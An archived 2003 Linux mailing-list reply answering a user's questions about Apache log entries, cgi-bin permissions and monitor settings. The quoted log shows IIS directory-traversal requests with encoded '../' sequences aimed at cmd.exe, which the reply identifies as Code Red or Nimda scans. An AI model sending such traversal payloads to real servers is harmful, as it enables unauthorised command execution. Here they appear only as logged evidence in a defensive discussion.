[GLLUG] apache security, file permissions and screen settings
Michael Watters
wattersm at wattersm.net
Fri Dec 5 17:52:35 EST 2003
Seth Bembeneck wrote:
> First: Apache security
>
> I just checked my apache log and saw these entrees:
>
> +++
>
> 68.113.22.41 - - [04/Dec/2003:23:32:57 +0000] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 392 "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:02 +0000] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 408 "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:07 +0000] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374 "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:12 +0000] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374 "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:17 +0000] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374 "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:31 +0000] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374 "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:37 +0000] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 365 "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:44 +0000] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 365 "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:49 +0000] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 375
> "-" "-"
>
> 68.113.22.41 - - [04/Dec/2003:23:33:54 +0000] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 375 "-" "-"
>
>
>
> +++
>
> Looks to me like some one trying to access my system, am I right? This
> made me start to question how secure my system is.
>
>
>
> Can any one give any steps on how to make sure it is secure? Any tests
> that can be run?
>
>
>
> Second: File permissions (probabely could also go under number 1):
>
>
>
> What should the permissions be for the /var/www/localhost/cgi-bin folder
> be? For the scripts in side the folder?
>
>
>
> Third: Screen Resolution and Refresh rate
>
>
>
> I just got an LCD monitor. How do I change the resolution and refresh
> rate for the x server?
>
>
>
> For all of the above, I’m using Gentoo as my OS.
>
>
>
> Thanks,
>
>
>
> Seth Bembeneck
>
> sbdataspiller at sbcglobal.net
>
>
>
> ^
>
> (0 0)
>
> --(((---v---)))----
>
>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> linux-user mailing list
> linux-user at egr.msu.edu
> http://www.egr.msu.edu/mailman/listinfo/linux-user
Those are just Code Red or Nimda attacks so you really don't have to
worry about them.
CGI scripts should be executable for the web server to access them,
usually chmod 755 works.
You can edit /etc/X11/XF86Config for the screen refresh rates, they are
listed under the Monitor section.
More information about the linux-user
mailing list